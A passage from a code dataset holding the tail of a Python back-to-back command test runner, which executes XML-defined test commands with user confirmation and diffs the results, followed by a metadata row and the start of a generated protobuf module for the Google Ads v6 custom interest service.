"timeout=",
"version",
]
try:
options, remaining_arguments = getopt.getopt(
sys.argv[1:], character_options, string_options
)
except getopt.GetoptError as error:
logging.critical("Syntax error: %s", error)
display_help()
sys.exit(1)
for option, argument in options:
if option == "--debug":
logging.disable(logging.NOTSET)
elif option in ("-f", "--force"):
parameters["Overwrite results"] = True
elif option in ("--help", "-?"):
display_help()
sys.exit(0)
elif option in ("-k", "--keep"):
parameters["Keep results"] = True
elif option in ("-n", "--newpath"):
if os.path.isdir(argument):
parameters["New command path"] = os.path.abspath(argument)
else:
logging.critical("-n|--newpath argument is not a path")
sys.exit(1)
elif option in ("-o", "--origpath"):
if os.path.isdir(argument):
parameters["Original command path"] = os.path.abspath(argument)
else:
logging.critical("-o|--origpath argument is not a path")
sys.exit(1)
elif option in ("-q", "--quiet"):
parameters["Quiet differences"] = True
elif option in ("-s", "--skip"):
parameters["Skip original command"] = True
elif option in ("-t", "--timeout"):
try:
parameters["Timeout"] = float(argument)
except ValueError:
logging.critical("-t|--timeout argument is not a (floating) number")
sys.exit(1)
if parameters["Timeout"] < MINIMUM_DEFAULT_TIMEOUT:
logging.critical(
"-t|--timeout argument must be >= %s seconds",
MINIMUM_DEFAULT_TIMEOUT,
)
sys.exit(1)
elif option == "--version":
print(ID.replace("@(" + "#)" + " $" + "Id" + ": ", "").replace(" $", ""))
sys.exit(0)
elif option in ("-y", "--autoconfirm"):
parameters["Auto confirm"] = True
elif option in ("-N", "--nocolors"):
parameters["No colors"] = True
logging.debug("process_command_line(): parameters:")
logging.debug(parameters)
logging.debug("process_command_line(): remaining_arguments:")
logging.debug(remaining_arguments)
return remaining_arguments
################################################################################
def is_privileged():
"""Return True if the utility is run with privileged accesses
or if we don't know"""
try:
return os.geteuid() == 0
except AttributeError:
# Happens when not running on a Unix operating system
# Assuming a Windows operating system:
try:
return ctypes.windll.shell32.IsUserAnAdmin() != 0
except:
# Happens when on some Windows version (XP) and other operating systems
# We return True when we don't know to stay on the safe side
return True
################################################################################
def get_tag_lines(xml_node, tag_name):
"""Return a list of non-blank stripped lines from an XML node"""
lines = []
tag_content = xml_node.getElementsByTagName(tag_name)
if tag_content:
nodelist = tag_content[0].childNodes
for node in nodelist:
if node.nodeType == node.TEXT_NODE:
for line in node.data.split(os.linesep):
if line.strip():
newline = line.strip()
# If line starts and ends with quotes, remove them
# but keep spaces inside:
if len(newline) >= 2 \
and newline[0] == '"' \
and newline[-1] == '"':
newline = newline[1:-1]
lines.append(newline)
return lines
################################################################################
def read_test_case(case):
"""Check and return the contents of a test case XML node"""
name = ""
if case.hasAttribute("name"):
name = case.getAttribute("name")
timeout = str(parameters["Timeout"])
if case.hasAttribute("timeout"):
timeout = case.getAttribute("timeout")
pre = get_tag_lines(case, "pre")
stdin = get_tag_lines(case, "stdin")
cmd = get_tag_lines(case, "cmd")
post = get_tag_lines(case, "post")
logging.debug("read_test_case(): name: %s", name)
logging.debug("read_test_case(): pre: ['%s']", "', '".join(pre))
logging.debug("read_test_case(): stdin: ['%s']", "', '".join(stdin))
logging.debug("read_test_case(): cmd: ['%s']", "', '".join(cmd))
logging.debug("read_test_case(): timeout: %s", timeout)
logging.debug("read_test_case(): post: ['%s']", "', '".join(post))
# Check the parameters:
try:
timeout_value = float(timeout)
except ValueError:
logging.critical(
'In test case "%s": the timeout argument is not a (floating) number', name
)
sys.exit(1)
if timeout_value <= 0:
logging.critical(
'In test case "%s": the timeout argument must be a positive number', name
)
sys.exit(1)
if len(cmd) == 0:
logging.critical('In test case "%s": a non empty cmd tag is mandatory', name)
sys.exit(1)
if len(cmd) > 1:
logging.error('In test case "%s": the cmd tag must be 1 line only', name)
sys.exit(1)
return name, pre, stdin, cmd[0], timeout_value, post
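# Illustrative test file layout, inferred from read_test_case() and main(); the root
# tag name is arbitrary (only its "program"/"processor" attributes are read), and the
# command and file names are hypothetical:
#
#   <tests program="sort" processor="b2bt">
#     <test-case name="basic sort" timeout="10">
#       <stdin>
#         banana
#         apple
#       </stdin>
#       <cmd>sort</cmd>
#       <post>ls</post>
#     </test-case>
#   </tests>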
################################################################################
def get_file_size(file_path):
"""Return a file size in bytes"""
file_stats = os.stat(file_path)
return file_stats.st_size
################################################################################
def get_file_digest(file_path):
"""Return a file MD5 digest in hexadecimal"""
chunk_size = 512 * 200
digest = hashlib.md5()
with open(file_path, "rb") as file:
for chunk in iter(lambda: file.read(chunk_size), b""):
digest.update(chunk)
return digest.hexdigest()
################################################################################
def describe_test_environment(test_directory, command_full_path):
"""Generate a test 0 sub-directory with system information
Return the command MD5 digest"""
# Making the test directories and getting inside:
directory = test_directory + os.sep + "0"
if not os.path.isdir(directory):
try:
os.makedirs(directory)
except OSError as error:
logging.critical(
'Unable to create the "%s" directory: %s', directory, error
)
sys.exit(1)
os.chdir(directory)
with open("info", "w") as file:
file.write("System/nodename = {}{}".format(os.uname().nodename, os.linesep))
try:
username = getpass.getuser()
except:
username = ""
file.write("System/user = {}{}".format(username, os.linesep))
file.write("Hardware/machine = {}{}".format(platform.machine(), os.linesep))
file.write("Hardware/processor = {}{}".format(platform.processor(), os.linesep))
file.write("Hardware/cpus = {}{}".format(os.cpu_count(), os.linesep))
file.write(
"OperatingSystem/system = {}{}".format(platform.system(), os.linesep)
)
file.write(
"OperatingSystem/release = {}{}".format(platform.release(), os.linesep)
)
file.write("Environment/locale = {}{}".format(locale.getlocale(), os.linesep))
file.write(
"Python/implementation = {}{}".format(
platform.python_implementation(), os.linesep
)
)
file.write(
"Python/version = {}{}".format(platform.python_version(), os.linesep)
)
file.write("Command/path = {}{}".format(command_full_path, os.linesep))
file.write(
"Command/size = {}{}".format(get_file_size(command_full_path), os.linesep)
)
command_md5 = get_file_digest(command_full_path)
file.write("Command/md5 = {}{}".format(command_md5, os.linesep))
if shutil.which("what"):
results = subprocess.run(
["what", "-q", command_full_path],
text=True,
capture_output=True,
check=False,
)
file.write("Command/what = {}{}".format(results.stdout, os.linesep))
if shutil.which("ident"):
results = subprocess.run(
["ident", "-q", command_full_path],
text=True,
capture_output=True,
check=False,
)
file.write("Command/ident = {}{}".format(results.stdout, os.linesep))
os.chdir(os.pardir + os.sep + os.pardir)
return command_md5
################################################################################
def ask_for_confirmation(text, accepted):
"""Print the text and return True if user input is in the accepted list"""
answer = input(text)
return answer.lower() in accepted
################################################################################
def confirm_test(pre_commands, standard_input, command_line, post_commands):
"""Return True if a test is to be executed"""
print(" About to execute the following commands:")
if pre_commands:
print(" pre:")
for line in pre_commands:
print(" %s" % line)
if standard_input:
print(" stdin:")
for line in standard_input:
print(" %s" % line)
print(" cmd:")
print(" %s" % command_line)
if post_commands:
print(" post:")
for line in post_commands:
print(" %s" % line)
return ask_for_confirmation(" Please confirm execution (y[es]): ", ("y", "yes"))
################################################################################
def execute_test(
test_directory,
test_number,
pre_commands,
standard_input,
full_command_path,
command_line,
timeout,
post_commands,
):
"""Execute a test in a subdirectory"""
logging.debug("execute_test(): test_directory=%s", test_directory)
logging.debug("execute_test(): test_number=%s", str(test_number))
logging.debug("execute_test(): pre_commands=%s", " ".join(pre_commands))
logging.debug("execute_test(): standard_input=%s", " ".join(standard_input))
logging.debug("execute_test(): full_command_path=%s", full_command_path)
logging.debug("execute_test(): command_line=%s", command_line)
logging.debug("execute_test(): timeout=%d", timeout)
logging.debug("execute_test(): post_commands=%s", " ".join(post_commands))
# Making the test directories and getting inside:
directory = test_directory + os.sep + str(test_number) + os.sep + "tmp"
if not os.path.isdir(directory):
try:
os.makedirs(directory)
except OSError as error:
logging.critical(
'Unable to create the "%s" directory: %s', directory, error
)
sys.exit(1)
os.chdir(directory)
# Executing commands defined in the "pre" section:
for line in pre_commands:
pre_results = subprocess.run(line, shell=True, check=False)
if pre_results.returncode != 0:
logging.warning(
"Pre command '%s' returned %d", line, pre_results.returncode
)
# Inserting the full command path in the command line at the first command reference:
command_basename = os.path.basename(full_command_path)
command_dirname = os.path.dirname(full_command_path)
line = ""
if command_line.startswith(command_basename):
line = command_dirname + os.sep + command_line
elif " " + command_basename in command_line:
line = command_line.replace(
" " + command_basename, " " + command_dirname + os.sep + command_basename, 1
)
elif "\t" + command_basename in command_line:
line = command_line.replace(
"\t" + command_basename,
"\t" + command_dirname + os.sep + command_basename,
1,
)
elif ";" + command_basename in command_line:
line = command_line.replace(
";" + command_basename, ";" + command_dirname + os.sep + command_basename, 1
)
logging.debug("execute_test(): modified command_line=%s", line)
# Executing command defined in the "cmd" section, keeping results if requested:
if not timeout:
timeout = parameters["Timeout"]
start_time = time.time_ns()
try:
if standard_input:
one_line_input = os.linesep.join(standard_input) + os.linesep
results = subprocess.run(
line,
shell=True,
text=True,
input=one_line_input,
capture_output=True,
timeout=timeout,
check=False,
)
else:
results = subprocess.run(
line,
shell=True,
text=True,
capture_output=True,
timeout=timeout,
check=False,
)
except subprocess.TimeoutExpired as status:
standard_output = ""
if status.stdout:
standard_output = status.stdout.decode("utf-8")
standard_error_output = ""
if status.stderr:
standard_error_output = status.stderr.decode("utf-8")
results = subprocess.CompletedProcess(
status.cmd, 0, standard_output, standard_error_output
)
elapsed_time = time.time_ns() - start_time
logging.debug("execute_test(): results:")
logging.debug(results)
if parameters["Keep results"]:
with open(os.pardir + os.sep + "returncode", "w") as file:
file.write(str(results.returncode))
with open(os.pardir + os.sep + "stdout", "w") as file:
file.write(results.stdout)
with open(os.pardir + os.sep + "stderr", "w") as file:
file.write(results.stderr)
with open(os.pardir + os.sep + "time", "w") as file:
file.write(
"Elapsed time in s = {}{}".format(elapsed_time / 1000000000, os.linesep)
)
file.write("Load average = {}{}".format(os.getloadavg(), os.linesep))
# Executing commands defined in the "post" section and collecting their output:
post_output = ""
for line in post_commands:
post_results = subprocess.run(
line, shell=True, text=True, capture_output=True, check=False
)
if post_results.returncode != 0:
logging.warning(
"Post command '%s' returned %d", line, post_results.returncode
)
if post_results.stdout:
post_output = post_output + post_results.stdout
if parameters["Keep results"]:
with open(os.pardir + os.sep + "post", "w") as file:
file.write(post_output)
# Removing unneeded directories
if parameters["Keep results"]:
os.chdir(os.pardir)
shutil.rmtree("tmp")
os.chdir(os.pardir + os.sep + os.pardir)
else:
os.chdir(os.pardir + os.sep + os.pardir + os.sep + os.pardir)
shutil.rmtree(test_directory)
return results, post_output
################################################################################
def load_previous_results(test_directory, test_number):
"""Load results from a previous run
Return a CompletedProcess object and a text string"""
if not os.path.isdir(test_directory + os.sep + str(test_number)):
return None, ""
with open(
test_directory + os.sep + str(test_number) + os.sep + "returncode", "r"
) as file:
returncode = int(file.readline())
with open(
test_directory + os.sep + str(test_number) + os.sep + "stdout", "r"
) as file:
stdout = file.read()
with open(
test_directory + os.sep + str(test_number) + os.sep + "stderr", "r"
) as file:
stderr = file.read()
with open(
test_directory + os.sep + str(test_number) + os.sep + "post", "r"
) as file:
post = file.read()
return subprocess.CompletedProcess([], returncode, stdout, stderr), post
################################################################################
def color_print(text, color):
"""Print a text in color if possible"""
if COLORAMA and not parameters["No colors"]:
print(color + text + colorama.Style.RESET_ALL)
else:
print(text)
################################################################################
def compute_version(text):
"""Compute a version number from a version string"""
version_parts = text.split(".")
version = 0
try:
if len(version_parts) >= 1:
version = int(version_parts[0]) * 100 * 100
if len(version_parts) >= 2:
version += int(version_parts[1]) * 100
if len(version_parts) == 3:
version += int(version_parts[2])
except:
version = -1
return version
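# Worked examples of the arithmetic above (two decimal digits per version component):
#   compute_version("1.1.2") == 1 * 100 * 100 + 1 * 100 + 2 == 10102
#   compute_version("2.0")   == 2 * 100 * 100 + 0 * 100     == 20000
#   compute_version("x.y")   == -1  (non-numeric parts fall back to -1)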
################################################################################
def verify_processor(attribute):
"""Verify if we use the correct program and version to process an XML file"""
processor = attribute.strip().split()
if processor[0] != "b2bt":
return False
if len(processor) == 1:
return True
if len(processor) > 2:
return False
version_requested = compute_version(processor[1])
current_version = compute_version(__version__)
if version_requested == -1 or current_version == -1:
return False
if version_requested > current_version:
return False
return True
################################################################################
def remind_command(same_command, command):
"""Print the command tested on the first difference encountered"""
if same_command:
same_command = False
if not parameters["Quiet differences"]:
print(" Command:")
print(" %s" % command)
return same_command
################################################################################
def main():
"""The program's main entry point"""
program_name = os.path.basename(sys.argv[0])
initialize_debugging(program_name)
process_environment_variables()
arguments = process_command_line()
if len(arguments) == 0:
logging.warning("Please specify at least 1 test file to process")
display_help()
sys.exit(0)
if is_privileged():
print("It's not recommended to run this utility as a privileged user")
print(
"and you should definitely avoid doing so when running unverified test suites!"
)
if not parameters["Auto confirm"]:
print(
"However you'll get the chance to review each command to be executed..."
)
if not ask_for_confirmation(
"Please confirm execution (y[es]): ", ("y", "yes")
):
print("Better safe than sorry!")
sys.exit(0)
for filename in arguments:
if not os.path.isfile(filename):
logging.error("'%s' is not a file name", filename)
else:
try:
test_file = defusedxml.minidom.parse(filename)
except:
logging.critical("XML file error")
sys.exit(1)
# Get the root element of the document:
test_suite = test_file.documentElement
# Get the name of the program we'll be testing:
program_tested = os.path.basename(filename).replace(".xml", "")
if test_suite.hasAttribute("program"):
program_tested = test_suite.getAttribute("program").strip()
color_print("Testing the '%s' command:" % program_tested, colorama.Style.BRIGHT)
# Get the processor required for this file and verify if it's OK:
if test_suite.hasAttribute("processor"):
if not verify_processor(test_suite.getAttribute("processor")):
logging.critical("This test file requires a different or more recent processor")
sys.exit(1)
# Determine if the original command will have to be executed:
execute_original_command = False
original_command_full_path = ""
if not parameters["Skip original command"]:
if (
not os.path.isdir(program_tested + ".orig")
or parameters["Overwrite results"]
):
execute_original_command = True
if parameters["Original command path"] == "":
original_command_full_path = shutil.which(program_tested)
else:
original_command_full_path = shutil.which(
program_tested, path=parameters["Original command path"]
)
if original_command_full_path is None:
logging.critical("Original command not found")
sys.exit(1)
else:
logging.debug(
"Original command found at: %s", original_command_full_path
)
# Determine if the new command will have to be executed:
execute_new_command = False
new_command_full_path = ""
if parameters["New command path"] != "":
if (
not os.path.isdir(program_tested + ".new")
or parameters["Overwrite results"]
):
execute_new_command = True
new_command_full_path = shutil.which(
program_tested, path=parameters["New command path"]
)
if new_command_full_path is None:
logging.critical("New command not found")
sys.exit(1)
else:
logging.debug("New command found at: %s", new_command_full_path)
# Get all the test cases in the test suite:
test_cases = test_suite.getElementsByTagName("test-case")
# If we are to keep results, note some system information
# for next time & place we'll make comparisons:
original_command_md5 = ""
new_command_md5 = ""
if parameters["Keep results"]:
if execute_original_command:
original_command_md5 = describe_test_environment(
program_tested + ".orig", original_command_full_path
)
if execute_new_command:
new_command_md5 = describe_test_environment(
program_tested + ".new", new_command_full_path
)
# But at the minimum check that we are not testing the same command:
else:
if execute_original_command:
original_command_md5 = get_file_digest(original_command_full_path)
if execute_new_command:
new_command_md5 = get_file_digest(new_command_full_path)
if original_command_md5 == new_command_md5:
logging.warning("The commands are the same! Disabling new command run")
execute_new_command = False
# Process each test case:
test_number = 0
skipped_count = 0
different_count = 0
same_count = 0
for test_case in test_cases:
test_name, pre, stdin, cmd, timeout, post = read_test_case(test_case)
test_number += 1
print(' Test #{} "{}"'.format(test_number, test_name))
# Confirm test execution (in case you are not the author of the test suite):
if not parameters["Auto confirm"]:
if not confirm_test(pre, stdin, cmd, post):
color_print(" Skipping test", colorama.Fore.YELLOW)
skipped_count += 1
continue
# Execute tests:
results1 = None
if execute_original_command:
results1, post_output1 = execute_test(
program_tested + ".orig",
test_number,
pre,
stdin,
original_command_full_path,
cmd,
timeout,
post,
)
elif not parameters["Skip original command"]:
results1, post_output1 = load_previous_results(
program_tested + ".orig", test_number
)
results2 = None
if execute_new_command:
results2, post_output2 = execute_test(
program_tested + ".new",
test_number,
pre,
stdin,
new_command_full_path,
cmd,
timeout,
post,
)
# Compare tests results:
if results1 and results2:
same = True
if results1.returncode != results2.returncode:
same = remind_command(same, cmd)
color_print(
" Return codes are different!",
colorama.Fore.RED + colorama.Style.BRIGHT,
)
if not parameters["Quiet differences"]:
print(" Original = {}".format(results1.returncode))
print(" New = {}".format(results2.returncode))
if results1.stdout != results2.stdout:
same = remind_command(same, cmd)
color_print(
" Standard output is different!",
colorama.Fore.RED + colorama.Style.BRIGHT,
)
if not parameters["Quiet differences"]:
diff = difflib.unified_diff(
str(results1.stdout).split(os.linesep),
str(results2.stdout).split(os.linesep),
fromfile="Original stdout",
tofile="New stdout",
)
for line in diff:
print(line)
if results1.stderr != results2.stderr:
same = remind_command(same, cmd)
color_print(
" Standard error output is different!",
colorama.Fore.RED + colorama.Style.BRIGHT,
)
if not parameters["Quiet differences"]:
diff = difflib.unified_diff(
str(results1.stderr).split(os.linesep),
str(results2.stderr).split(os.linesep),
fromfile="Original stderr",
tofile="New stderr",
)
for line in diff:
print(line)
if post_output1 != post_output2:
same = remind_command(same, cmd)
color_print(
" Post commands output is different!",
colorama.Fore.RED + colorama.Style.BRIGHT,
)
if not parameters["Quiet differences"]:
diff = difflib.unified_diff(
str(post_output1).split(os.linesep),
str(post_output2).split(os.linesep),
fromfile="Original post output",
tofile="New post output",
)
for line in diff:
print(line)
if same:
same_count += 1
color_print(" Same results", colorama.Fore.GREEN)
else:
different_count += 1
# Print test suite results:
if not parameters["Skip original command"] and execute_new_command:
color_print("Results:", colorama.Style.BRIGHT)
if different_count:
color_print(
" {} out of {} test cases have different results".format(
different_count, same_count + different_count
),
colorama.Style.BRIGHT,
)
else:
color_print(
" All {} test cases have the same results".format(same_count),
colorama.Fore.GREEN,
)
if skipped_count:
color_print(
" {} test cases skipped".format(skipped_count),
colorama.Fore.YELLOW,
)
sys.exit(0)
if __name__ == "__main__":
main()
| 38.050701
| 100
| 0.520398
|
025da87a83ee7760d2e4cfa4afa7ab3bd0da8391
| 18,330
|
py
|
Python
|
google/ads/google_ads/v6/proto/services/custom_interest_service_pb2.py
|
jphanwebstaurant/google-ads-python
|
600812b2afcc4d57f00b47dfe436620ce50bfe9b
|
[
"Apache-2.0"
] | 1
|
2021-04-09T04:28:47.000Z
|
2021-04-09T04:28:47.000Z
|
google/ads/google_ads/v6/proto/services/custom_interest_service_pb2.py
|
jphanwebstaurant/google-ads-python
|
600812b2afcc4d57f00b47dfe436620ce50bfe9b
|
[
"Apache-2.0"
] | null | null | null |
google/ads/google_ads/v6/proto/services/custom_interest_service_pb2.py
|
jphanwebstaurant/google-ads-python
|
600812b2afcc4d57f00b47dfe436620ce50bfe9b
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads_v6/proto/services/custom_interest_service.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.ads.google_ads.v6.proto.resources import custom_interest_pb2 as google_dot_ads_dot_googleads__v6_dot_proto_dot_resources_dot_custom__interest__pb2
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
from google.api import client_pb2 as google_dot_api_dot_client__pb2
from google.api import field_behavior_pb2 as google_dot_api_dot_field__behavior__pb2
from google.api import resource_pb2 as google_dot_api_dot_resource__pb2
from google.protobuf import field_mask_pb2 as google_dot_protobuf_dot_field__mask__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/ads/googleads_v6/proto/services/custom_interest_service.proto',
package='google.ads.googleads.v6.services',
syntax='proto3',
serialized_options=b'\n$com.google.ads.googleads.v6.servicesB\032CustomInterestServiceProtoP\001ZHgoogle.golang.org/genproto/googleapis/ads/googleads/v6/services;services\242\002\003GAA\252\002 Google.Ads.GoogleAds.V6.Services\312\002 Google\\Ads\\GoogleAds\\V6\\Services\352\002$Google::Ads::GoogleAds::V6::Services',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\nDgoogle/ads/googleads_v6/proto/services/custom_interest_service.proto\x12 google.ads.googleads.v6.services\x1a=google/ads/googleads_v6/proto/resources/custom_interest.proto\x1a\x1cgoogle/api/annotations.proto\x1a\x17google/api/client.proto\x1a\x1fgoogle/api/field_behavior.proto\x1a\x19google/api/resource.proto\x1a google/protobuf/field_mask.proto\"b\n\x18GetCustomInterestRequest\x12\x46\n\rresource_name\x18\x01 \x01(\tB/\xe0\x41\x02\xfa\x41)\n\'googleads.googleapis.com/CustomInterest\"\xa3\x01\n\x1cMutateCustomInterestsRequest\x12\x18\n\x0b\x63ustomer_id\x18\x01 \x01(\tB\x03\xe0\x41\x02\x12R\n\noperations\x18\x02 \x03(\x0b\x32\x39.google.ads.googleads.v6.services.CustomInterestOperationB\x03\xe0\x41\x02\x12\x15\n\rvalidate_only\x18\x04 \x01(\x08\"\xe1\x01\n\x17\x43ustomInterestOperation\x12/\n\x0bupdate_mask\x18\x04 \x01(\x0b\x32\x1a.google.protobuf.FieldMask\x12\x43\n\x06\x63reate\x18\x01 \x01(\x0b\x32\x31.google.ads.googleads.v6.resources.CustomInterestH\x00\x12\x43\n\x06update\x18\x02 \x01(\x0b\x32\x31.google.ads.googleads.v6.resources.CustomInterestH\x00\x42\x0b\n\toperation\"n\n\x1dMutateCustomInterestsResponse\x12M\n\x07results\x18\x02 \x03(\x0b\x32<.google.ads.googleads.v6.services.MutateCustomInterestResult\"3\n\x1aMutateCustomInterestResult\x12\x15\n\rresource_name\x18\x01 \x01(\t2\xf9\x03\n\x15\x43ustomInterestService\x12\xcd\x01\n\x11GetCustomInterest\x12:.google.ads.googleads.v6.services.GetCustomInterestRequest\x1a\x31.google.ads.googleads.v6.resources.CustomInterest\"I\x82\xd3\xe4\x93\x02\x33\x12\x31/v6/{resource_name=customers/*/customInterests/*}\xda\x41\rresource_name\x12\xf2\x01\n\x15MutateCustomInterests\x12>.google.ads.googleads.v6.services.MutateCustomInterestsRequest\x1a?.google.ads.googleads.v6.services.MutateCustomInterestsResponse\"X\x82\xd3\xe4\x93\x02\x39\"4/v6/customers/{customer_id=*}/customInterests:mutate:\x01*\xda\x41\x16\x63ustomer_id,operations\x1a\x1b\xca\x41\x18googleads.googleapis.comB\x81\x02\n$com.google.ads.googleads.v6.servicesB\x1a\x43ustomInterestServiceProtoP\x01ZHgoogle.golang.org/genproto/googleapis/ads/googleads/v6/services;services\xa2\x02\x03GAA\xaa\x02 Google.Ads.GoogleAds.V6.Services\xca\x02 Google\\Ads\\GoogleAds\\V6\\Services\xea\x02$Google::Ads::GoogleAds::V6::Servicesb\x06proto3'
,
dependencies=[google_dot_ads_dot_googleads__v6_dot_proto_dot_resources_dot_custom__interest__pb2.DESCRIPTOR,google_dot_api_dot_annotations__pb2.DESCRIPTOR,google_dot_api_dot_client__pb2.DESCRIPTOR,google_dot_api_dot_field__behavior__pb2.DESCRIPTOR,google_dot_api_dot_resource__pb2.DESCRIPTOR,google_dot_protobuf_dot_field__mask__pb2.DESCRIPTOR,])
_GETCUSTOMINTERESTREQUEST = _descriptor.Descriptor(
name='GetCustomInterestRequest',
full_name='google.ads.googleads.v6.services.GetCustomInterestRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='resource_name', full_name='google.ads.googleads.v6.services.GetCustomInterestRequest.resource_name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\002\372A)\n\'googleads.googleapis.com/CustomInterest', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=318,
serialized_end=416,
)
_MUTATECUSTOMINTERESTSREQUEST = _descriptor.Descriptor(
name='MutateCustomInterestsRequest',
full_name='google.ads.googleads.v6.services.MutateCustomInterestsRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='customer_id', full_name='google.ads.googleads.v6.services.MutateCustomInterestsRequest.customer_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\002', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='operations', full_name='google.ads.googleads.v6.services.MutateCustomInterestsRequest.operations', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\002', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='validate_only', full_name='google.ads.googleads.v6.services.MutateCustomInterestsRequest.validate_only', index=2,
number=4, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=419,
serialized_end=582,
)
_CUSTOMINTERESTOPERATION = _descriptor.Descriptor(
name='CustomInterestOperation',
full_name='google.ads.googleads.v6.services.CustomInterestOperation',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='update_mask', full_name='google.ads.googleads.v6.services.CustomInterestOperation.update_mask', index=0,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='create', full_name='google.ads.googleads.v6.services.CustomInterestOperation.create', index=1,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='update', full_name='google.ads.googleads.v6.services.CustomInterestOperation.update', index=2,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='operation', full_name='google.ads.googleads.v6.services.CustomInterestOperation.operation',
index=0, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
],
serialized_start=585,
serialized_end=810,
)
_MUTATECUSTOMINTERESTSRESPONSE = _descriptor.Descriptor(
name='MutateCustomInterestsResponse',
full_name='google.ads.googleads.v6.services.MutateCustomInterestsResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='results', full_name='google.ads.googleads.v6.services.MutateCustomInterestsResponse.results', index=0,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=812,
serialized_end=922,
)
_MUTATECUSTOMINTERESTRESULT = _descriptor.Descriptor(
name='MutateCustomInterestResult',
full_name='google.ads.googleads.v6.services.MutateCustomInterestResult',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='resource_name', full_name='google.ads.googleads.v6.services.MutateCustomInterestResult.resource_name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=924,
serialized_end=975,
)
_MUTATECUSTOMINTERESTSREQUEST.fields_by_name['operations'].message_type = _CUSTOMINTERESTOPERATION
_CUSTOMINTERESTOPERATION.fields_by_name['update_mask'].message_type = google_dot_protobuf_dot_field__mask__pb2._FIELDMASK
_CUSTOMINTERESTOPERATION.fields_by_name['create'].message_type = google_dot_ads_dot_googleads__v6_dot_proto_dot_resources_dot_custom__interest__pb2._CUSTOMINTEREST
_CUSTOMINTERESTOPERATION.fields_by_name['update'].message_type = google_dot_ads_dot_googleads__v6_dot_proto_dot_resources_dot_custom__interest__pb2._CUSTOMINTEREST
_CUSTOMINTERESTOPERATION.oneofs_by_name['operation'].fields.append(
_CUSTOMINTERESTOPERATION.fields_by_name['create'])
_CUSTOMINTERESTOPERATION.fields_by_name['create'].containing_oneof = _CUSTOMINTERESTOPERATION.oneofs_by_name['operation']
_CUSTOMINTERESTOPERATION.oneofs_by_name['operation'].fields.append(
_CUSTOMINTERESTOPERATION.fields_by_name['update'])
_CUSTOMINTERESTOPERATION.fields_by_name['update'].containing_oneof = _CUSTOMINTERESTOPERATION.oneofs_by_name['operation']
_MUTATECUSTOMINTERESTSRESPONSE.fields_by_name['results'].message_type = _MUTATECUSTOMINTERESTRESULT
DESCRIPTOR.message_types_by_name['GetCustomInterestRequest'] = _GETCUSTOMINTERESTREQUEST
